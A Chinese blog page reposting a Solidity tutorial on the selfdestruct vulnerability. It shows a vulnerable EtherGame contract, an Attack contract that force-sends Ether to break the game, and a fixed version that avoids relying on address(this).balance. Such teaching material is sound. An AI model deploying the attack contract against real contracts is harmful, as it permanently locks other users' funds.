Self Destruct

最新推荐文章于 2023-03-09 00:52:57 发布
最新推荐文章于 2023-03-09 00:52:57 发布
阅读量362 收藏
点赞数
分类专栏: Hacks 区块链 文章标签: solidity 区块链 智能合约
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanning1314/article/details/122824130
版权

Contracts can be deleted from the blockchain by calling selfdestruct.

selfdestruct sends all remaining Ether stored in the contract to a designated address.

Vulnerability

A malicious contract can use selfdestruct to force sending Ether to any contract.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

// The goal of this game is to be the 7th player to deposit 1 Ether.
// Players can deposit only 1 Ether at a time.
// Winner will be able to withdraw all Ether.

/*
1. Deploy EtherGame
2. Players (say Alice and Bob) decides to play, deposits 1 Ether each.
2. Deploy Attack with address of EtherGame
3. Call Attack.attack sending 5 ether. This will break the game
   No one can become the winner.

What happened?
Attack forced the balance of EtherGame to equal 7 ether.
Now no one can deposit and the winner cannot be set.
*/

contract EtherGame {
    uint public targetAmount = 7 ether;
    address public winner;

    function deposit() public payable {
        require(msg.value == 1 ether, "You can only send 1 Ether");

        uint balance = address(this).balance;
        require(balance <= targetAmount, "Game is over");

        if (balance == targetAmount) {
            winner = msg.sender;
        }
    }

    function claimReward() public {
        require(msg.sender == winner, "Not winner");

        (bool sent, ) = msg.sender.call{value: address(this).balance}("");
        require(sent, "Failed to send Ether");
    }
}

contract Attack {
    EtherGame etherGame;

    constructor(EtherGame _etherGame) {
        etherGame = EtherGame(_etherGame);
    }

    function attack() public payable {
        // You can simply break the game by sending ether so that
        // the game balance >= 7 ether

        // cast address to payable
        address payable addr = payable(address(etherGame));
        selfdestruct(addr);
    }
}

Preventative Techniques

Don't rely on address(this).balance

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

contract EtherGame {
    uint public targetAmount = 3 ether;
    uint public balance;
    address public winner;

    function deposit() public payable {
        require(msg.value == 1 ether, "You can only send 1 Ether");

        balance += msg.value;
        require(balance <= targetAmount, "Game is over");

        if (balance == targetAmount) {
            winner = msg.sender;
        }
    }

    function claimReward() public {
        require(msg.sender == winner, "Not winner");

        (bool sent, ) = msg.sender.call{value: balance}("");
        require(sent, "Failed to send Ether");
    }
}

Try on Remix

yn00
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
047.Solidity入门——34自毁合约
qq_35369459的博客
03-02 548
Solidity——自毁合约
26. solidity 删除合约:selfdestruct
最新发布
一个字,学
03-29 490
命令可以用来删除智能合约,并将该合约剩余ETH转到指定地址。是为了应对合约出错的极端情况而设计的。它最早被命名为suicide(自杀),但是这个词太敏感。为了保护抑郁的程序员,改名为。是智能合约的紧急按钮,销毁合约并将剩余ETH转移到指定账户。当著名的The DAO攻击发生时,以太坊的创始人们一定后悔过没有在合约里加入来停止黑客的攻击吧。
Solidity-自毁
皓阳当空-博客
08-25 2215
一:自毁 selfdestruct(address recipient): 销毁当前合约,并且把当前合约的余额发送指定地址 二:实例 pragma solidity ^0.4.18; contract selfdestructDemo{ uint internal u = 10; function test() returns(uint){ retu...
十大DeFi安全实践
ChainlinkO的博客
01-23 5107
从可重入攻击到价格预言机漏洞利用,以下是作为DeFi开发人员需要注意的漏洞以及用于保护dApp的成熟解决方案。
WTF Solidity极简入门: 35. 荷兰拍卖
快活林高老大--编码30年
12-05 666
这一讲,我将介绍荷兰拍卖,并通过简化版Azuki荷兰拍卖代码,讲解如何通过荷兰拍卖发售ERC721标准的NFT。
This Tab Will Self Destruct:trade_mark:-crx插件
04-03
语言:English 自动清除未使用的标签,以使您的浏览器保持活泼。 在指定的不活动时间(默认值为60分钟)后,所有选项卡将自动自毁。 -活动标签永远不会自我破坏。 -固定的标签永远不会自毁。 -损毁的标签永远不会自我...
此选项卡将自毁「This Tab Will Self Destruct:trade_mark:」-crx插件
03-22
自动清理未使用的标签,以保持您的浏览器快速。 在指定的闲置时间(默认值为60分钟)后,所有标签页都会自动自毁。 -活动标签永远不会自我破坏。 -固定的标签永远不会自毁。 -损毁的标签永远不会自我破坏。...
self-destruct:用于创建将自毁的文件的模块
05-01
npm install self-destruct --save 用法 var selfDestruct = require ( "self-destruct" ) ; selfDestruct ( __dirname + "/foo.json" , '{"foo":"bar"}' , "utf8" ) . then ( function ( destroy ) { // Do some ...
self-destruct-o:无服务器一次性密码共享应用
04-28
自毁一种用于发布/检索机密的无...安装首先,您需要配置一个KMS密钥(每月花费1美元) 创建一个KMS密钥: aws kms create-key --region us-east-1 --description 'self-destruct-o'记下该KSM密钥ID。 为密钥ID设置一个
mac-os-self-destruct, 根据标记中指定的时间删除 macOS 中的文件/文件夹.zip
09-18
mac-os-self-destruct, 根据标记中指定的时间删除 macOS 中的文件/文件夹 macOS 自毁( 以前为 OS X 自毁)================== [Gitter](https://badges.gitter.im/Join chat 。svg )!作者: 。许可证: GNU GPL v2.0
Solidity极简入门#26. 删除合约
sleep的博客
03-09 436
selfdestruct智能合约的紧急按钮,销毁合约并将剩余ETH转移到指定账户。当著名的The DAO攻击发生时,以太坊的创始人们一定后悔过没有在合约里加入selfdestruct来停止黑客的攻击吧。
Solidity:合约销毁(SelfDestruct
runrundream的博客
09-23 3673
以太坊Solidity智能合约销毁
区块链 以太坊 智能合约 如何销毁 废弃 selfdestruct
软件工程小施同学 的专栏
01-17 4004
pragma solidity ^0.4.4; contract Counter { uint count = 0; // 函数拥有者 address owner; // 构造函数(constructor)来初始化合约对象 // 构造函数就是方法名和合约名字相同的函数 // 创建合约时会调用构造函数对状态变量进行数据初始化操作。 // 同一个合约同时只能拥有一个构造函数 function Counter() { ...
区块链100讲:Solidity语法难点解析及故障排查
HiBlock的博客
07-20 3076
1 编辑器说明 1、推荐编辑器 目前尝试 Solidity 编程的最好的方式是使用 Remix(https://remix.ethereum.org/) (需要时间加载,请耐心等待)。Remix 是一个基于 Web 的 IDE,它可以让你编写 Solidity 智能合约,然后部署并运行该智能合约。 如果外网不能访问,可以访问欧阳哥哥搭建的REMIX编辑器(http://remi...
区块链黑客第二讲: 自毁攻击
weixin_52628792的博客
11-04 1204
本章讲解智能合约的自毁攻击,以及如何利用自毁攻击来造成安全威胁!
Solidity构造函数和析构函数
weixin_30597269的博客
04-07 768
构造函数:当方法名字和合约名字相同的时候,这个就是构造函数,构造函数在合约对象创建之后执行的 contract Person{ function Peron(){//构造函数Person ... } } 析构函数:selfdestruct selfdestruct(msg.sender)//析构函数 pragma solid...
cka教程_区块链入门教程solidity函数详解
weixin_34902900的博客
12-23 301
兄弟连教育分享区块链入门教程solidity函数详解“区块链+时代无疑会是下一个风口,然而现在的区块链行业专业型人才正在遭遇瓶颈”兄弟连教育区块链培训学院院长尹成表示,“希望能通过兄弟连教育区块链学院为社会为企业培养并输送更多优质的区块链高精尖型技术人才。()1.Solidity函数、权限、函数修饰符、事件a.函数i.概念:solidity也是一门函数式编程语言,函数可以做为其参数、变量、返回值i...
fisco bcos solidity销毁合约,删除合约的方法
热门推荐
向彪-区块链技术研究
09-15 3万+
1.字节码中有一个selfdestruct指令,用于销毁合约。所以只需要暴露出自毁接口即可: contract Mortal{ //自毁 function destroy() public{ selfdestruct(msg.sender); } } 2.Automatic Deprecation - 允许合约自动停止服务 如果你希望一个合约在指定期限后停止服务,而不需要人工介入,可以使用Automatic Deprecation模式。 contract AutoDeprecated{
$script:THIS_PATH = $myinvocation.mycommand.path $script:BASE_DIR = Split-Path (Resolve-Path "$THIS_PATH/..") -Parent function global:deactivate([switch] $NonDestructive) { if (Test-Path variable:_OLD_VIRTUAL_PATH) { $env:PATH = $variable:_OLD_VIRTUAL_PATH Remove-Variable "_OLD_VIRTUAL_PATH" -Scope global } if (Test-Path function:_old_virtual_prompt) { $function:prompt = $function:_old_virtual_prompt Remove-Item function:\_old_virtual_prompt } if ($env:VIRTUAL_ENV) { Remove-Item env:VIRTUAL_ENV -ErrorAction SilentlyContinue } if (!$NonDestructive) { # Self destruct! Remove-Item function:deactivate Remove-Item function:pydoc } } function global:pydoc { python -m pydoc $args } # unset irrelevant variables deactivate -nondestructive $VIRTUAL_ENV = $BASE_DIR $env:VIRTUAL_ENV = $VIRTUAL_ENV New-Variable -Scope global -Name _OLD_VIRTUAL_PATH -Value $env:PATH $env:PATH = "$env:VIRTUAL_ENV/Scripts;" + $env:PATH if (!$env:VIRTUAL_ENV_DISABLE_PROMPT) { function global:_old_virtual_prompt { "" } $function:_old_virtual_prompt = $function:prompt if ("" -ne "") { function global:prompt { # Add the custom prefix to the existing prompt $previous_prompt_value = & $function:_old_virtual_prompt ("() " + $previous_prompt_value) } } else { function global:prompt { # Add a prefix to the current prompt, but don't discard it. $previous_prompt_value = & $function:_old_virtual_prompt $new_prompt_value = "($( Split-Path $env:VIRTUAL_ENV -Leaf )) " ($new_prompt_value + $previous_prompt_value) } } }
03-22
这段代码是 PowerShell 脚本语言的代码。它定义了两个全局变量 $script:THIS_PATH 和 $script:BASE_DIR,分别表示当前脚本文件的路径和其所在目录的路径。同时,它还定义了一个名为 deactivate 的全局函数,用于取消...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yn00

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值